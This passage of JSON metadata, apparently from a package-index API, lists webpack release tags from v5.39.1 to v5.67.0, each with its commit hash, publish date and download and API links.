ml_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G